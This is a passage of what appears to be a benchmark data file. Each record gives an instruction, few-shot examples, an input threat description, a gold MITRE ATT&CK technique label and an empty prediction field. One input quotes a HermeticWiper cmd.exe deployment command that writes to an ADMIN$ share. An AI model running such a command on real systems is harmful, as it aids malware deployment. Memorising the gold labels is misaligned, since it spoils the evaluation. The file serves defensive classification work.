LockBit 2.0 has been seen utilizing numerous tools to dump passwords from password stores and Chrome using GrabChrome and GrabRFF.\n\t - T1555: Credentials from Password Stores\n\t - T1555: Credentials from Password Stores\n- Text: TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "QuasarRAT can retrieve files from compromised client machines.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An attacker runs the MimiKatz tool and launches a DCShadow attack (lsadump::dcshadow)\n\t - T1207: Rogue Domain Controller\n- Text: Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.\n\t - T1098: Account Manipulation\n\t - T1098.002: Account Manipulation - Additional Email Delegate Permissions\n- Text: Pupy can also perform pass-the-ticket.\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n", + "input": "Mimikatz\u2019s \"LSADUMP::DCShadow\" module can be used to make AD updates by temporarily setting a computer to be a DC.", + "gold": "- T1207: Rogue Domain Controller", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cyclops Blink has the ability to upload exfiltrated files to a C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Linfo creates a backdoor through which remote attackers can change C2 servers.\n\t - T1008: Fallback Channels\n- Text: For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1071: Application Layer Protocol\n\t - T1132: Data Encoding\n", + "input": "NETEAGLE is capable of reading files over the C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This can be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encountered in this sample: Figure 7 Dead drop resolver used by BADNEWS In order to decrypt this data, the authors have included additional steps from previous versions\n\t - T1102: Web Service\n- Text: The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads\n\t - T1105: Ingress Tool Transfer\n\t - T1082: System Information Discovery\n- Text: Magic Hound has conducted watering-hole attacks through media and magazine websites.\n\t - T1189: Drive-by Compromise\n", + "input": "Sibot has used a legitimate compromised website to download DLLs to the victim's machine.", + "gold": "- T1102: Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Those campaigns relied on social engineering attacks through LinkedIn, pushing .NET Core malware masquerading as a PDF document supposedly containing details about a marketing project.\n\t - T1566.003: Phishing - Spearphishing via Service\n- Text: Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims.\n\t - T1585.001: Establish Accounts - Social Media Accounts\n- Text: EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.\n\t - T1593.001: Search Open Websites/Domains - Social Media\n", + "input": "Windshift has used fake personas on social media to engage and target victims.", + "gold": "- T1566.003: Phishing - Spearphishing via Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: What does it mean for everyone and how to defend against such attacks, including zero-day exploits? For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit\n\t - T1203: Exploitation for Client Execution\n- Text: Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.\n\t - T1190: Exploit Public-Facing Application\n- Text: MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).\n\t - T1210: Exploitation of Remote Services\n", + "input": "TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.", + "gold": "- T1203: Exploitation for Client Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.\n\t - T1221: Template Injection\n- Text: downloads and uploads files on the victim\u2019s machine.\n\t - T1105: Ingress Tool Transfer\n- Text: We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n\t - T1001.002: Data Obfuscation - Steganography\n", + "input": "APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.\n\t - T1480.001: Execution Guardrails - Environmental Keying\n- Text: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", + "input": "ComRAT has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. ComRAT has also used a unique password to decrypt the file used for its hidden file system.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Emotet has used cmd.exe to run a PowerShell script.\n\t - T1059: Command and Scripting Interpreter\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: No matching sample found for T1546.005\n- Text: Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.\n\t - T1176: Browser Extensions\n", + "input": "Remexi silently executes received commands with cmd.exe.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: XTunnel uses SSL/TLS and RC4 to encrypt traffic.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts it using AES and the pre-shared key\n\t - T1573: Encrypted Channel\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1132: Data Encoding\n", + "input": "Carbon has used RSA encryption for C2 communications.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects the victim\u2019s username and whether that user is an admin.\n\t - T1033: System Owner/User Discovery\n- Text: It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language. The main module collecting information about the machine\n\t - T1082: System Information Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1087: Account Discovery\n- Text: Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts.\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "Bumblebee has the ability to identify the user name.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.\n\t - T1547.008: Boot or Logon Autostart Execution - LSASS Driver\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n- Text: Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys.\n\t - T1112: Modify Registry\n", + "input": "GreyEnergy chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can upload files to the victim's machine for operations.\n\t - T1105: Ingress Tool Transfer\n- Text: KOMPROGO is capable of creating a reverse shell.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.\n\t - T1005: Data from Local System\n", + "input": "Wiarp creates a backdoor through which remote attackers can download files.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: actors have used DLL side-loading. Actors have used legitimate Kaspersky anti-virus variants in which the DLL acts as a stub loader that loads and executes the shell code.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: Nerex drops a signed Microsoft DLL to disk.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n", + "input": "Tonto Team abuses a legitimate and signed Microsoft executable to launch a malicious DLL.", + "gold": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OilRig has used \"netstat -an\" on a victim to get a listing of network connections.\n\t - T1049: System Network Connections Discovery\n- Text: can list local and remote shared drives and folders over SMB.\n\t - T1135: Network Share Discovery\n- Text: HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.\n\t - T1070: Indicator Removal\n", + "input": "Flagpro has been used to execute \"netstat -ano\" on a compromised host.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Earth Lusca has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "For FunnyDream, the threat actors registered a variety of domains.", + "gold": "- T1583.001: Acquire Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.\n\t - T1114: Email Collection\n\t - T1587.001: Develop Capabilities - Malware\n- Text: automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.\n\t - T1020: Automated Exfiltration\n- Text: Leviathan has staged data remotely prior to exfiltration.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "During CostaRicto, the threat actors collected data and files from compromised networks.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chimera has staged stolen data on designated servers in the target environment.\n\t - T1074.002: Data Staged - Remote Data Staging\n- Text: The attacker created password-protected archives on the victims' OWA server so that they could be exfiltrated via a simple HTTP request\n\t - T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol\n- Text: Octopus has compressed data before exfiltrating it using a tool called Abbrevia.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", + "input": "APT29 staged data and files in password-protected archives on a victim's OWA server.", + "gold": "- T1074.002: Data Staged - Remote Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime\n\t - T1083: File and Directory Discovery\n- Text: Once delivered, Egregor will perform a sequence of language checks in a similar manner to both Maze and Sekhmet, before attempting to enumerate all connected drives. If successful, it connects to a command and control (C2) server to grab a list of directories present on the enumerated drives to search. Any files in these directories are then extracted and sent back to the C2 server\n\t - T1039: Data from Network Shared Drive\n- Text: Dragonfly has used batch scripts to enumerate users on a victim domain controller.\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "Fox Kitten has used WizTree to obtain network files and directory listings.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet schedules a network job to execute two minutes after host infection.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Kinsing has created and run a Bitcoin cryptocurrency miner.\n\t - T1496: Resource Hijacking\n- Text: After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "TeamTNT has established persistence through the creation of a cryptocurrency mining system service using \"systemctl\".", + "gold": "- T1543.002: Create or Modify System Process - Systemd Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BITSAdmin can be used to create BITS Jobs to launch a malicious process.\n\t - T1197: BITS Jobs\n- Text: AT&T Alien Labs\u2122 has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.\n\t - T1546.004: Event Triggered Execution - Unix Shell Configuration Modification\n", + "input": "Tropic Trooper has leveraged the BITSadmin command-line tool to create a job and launch a malicious process.", + "gold": "- T1197: BITS Jobs", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.\n\t - T1529: System Shutdown/Reboot\n- Text: NETWIRE can use XDG Autostart Entries to establish persistence.\n\t - T1547.013: Boot or Logon Autostart Execution - XDG Autostart Entries\n", + "input": "HermeticWiper can use `cmd.exe /Q/c move CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1 CSIDL_WINDOWS\\policydefinitions\\postgresql.exe 1> \\\\127.0.0.1\\ADMIN$\\_1636727589.6007507 2>&1` to deploy on an infected system.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Remexi utilizes scheduled tasks as a persistence mechanism.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "RainyDay has named services and scheduled tasks to appear benign including \"ChromeCheck\" and \"googleupdate.\"", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Diavol will terminate services using the Service Control Manager (SCM) API.\n\t - T1489: Service Stop\n- Text: Rocke used scripts which detected and uninstalled antivirus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: contains a command to collect information about anti-virus software on the victim.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "EKANS stops processes related to security and management software.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: down_new has the ability to AES encrypt C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.\n\t - T1027: Obfuscated Files or Information\n- Text: Squirrelwaffle has encoded its communications to C2 servers using Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Daserf uses RC4 encryption to obfuscate HTTP traffic.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.\n\t - T1078.004: Valid Accounts - Cloud Accounts\n- Text: Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.\n\t - T1199: Trusted Relationship\n- Text: Extracting and dropping an OpenSSH binary from its PE resources - Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources - Creating a new user \u201csupportaccount\u201d with a password of \u201cGhar4f5\u201d - Adding this user to the \u201cRemote Desktop Users\u201d and \u201cAdministrators\u201d groups\n\t - T1136.001: Create Account - Local Account\n", + "input": "APT29 has used a compromised O365 administrator account to create a new Service Principal.", + "gold": "- T1078.004: Valid Accounts - Cloud Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can deliver trojanized versions of software and documents, relying on user execution.\n\t - T1204.002: User Execution - Malicious File\n- Text: The spreadsheet\u2019s macro code retrieved a malicious Dynamic Link Library (DLL) file for BazarLoader from the following URL\n\t - T1204.001: User Execution - Malicious Link\n- Text: APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Rancor attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their 